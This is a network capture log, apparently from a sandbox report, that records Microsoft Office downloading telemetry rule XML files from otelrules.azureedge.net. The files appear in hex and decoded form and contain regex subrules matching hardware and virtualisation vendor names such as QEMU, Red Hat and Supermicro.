2024-11-22 19:36:25 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49828	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:24 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:25 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:25 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193625Z-178bfbc474bmqmgjhC1NYCy16c00000003e000000000guu4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:25 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49829	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:26 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:27 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:27 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 4ad18980-501e-008c-067e-3bcd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193627Z-174c587ffdf4zw2thC1TEBu34000000001wg00000000nk4m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:27 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49830	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:27 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:27 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:27 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: d8899c23-b01e-003e-234e-3c8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193627Z-15b8b599d88l2dpthC1TEBmzr000000001r000000000q4mv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:27 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49831	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:27 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:27 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:27 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193627Z-178bfbc474bwh9gmhC1NYCy3rs00000003kg0000000029st x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:27 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49832	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:27 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:27 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:27 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: edaf41ae-201e-0051-5e49-3c7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193627Z-174c587ffdfcj798hC1TEB9bq4000000021000000000dehp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:27 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49833	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:27 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:27 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:27 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 9cc78053-901e-008f-7b8c-3a67a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193627Z-174c587ffdf4zw2thC1TEBu340000000021g0000000028x1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:27 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49834	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:29 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:29 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:29 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193629Z-178bfbc474bfw4gbhC1NYCunf400000003gg0000000017h5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:29 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49835	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:29 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:29 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:29 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: b3049c5e-001e-0082-330c-3d5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193629Z-178bfbc474bgvl54hC1NYCsfuw000000039000000000unv7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:29 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49836	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:29 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:29 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:29 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 5c8e7bca-d01e-0049-4f4b-3ce7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193629Z-15b8b599d88tmlzshC1TEB4xpn00000001p000000000r812 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:29 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49838	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:29 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:29 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:29 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 9a395038-201e-0071-807e-3bff15000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193629Z-174c587ffdftjz9shC1TEBsh9800000001t0000000007qth x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:29 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49837	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:29 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:30 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:29 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 3d26e0c5-e01e-0020-6638-3cde90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193629Z-178bfbc474bv7whqhC1NYC1fg400000003fg0000000054zf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:30 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49839	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:31 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
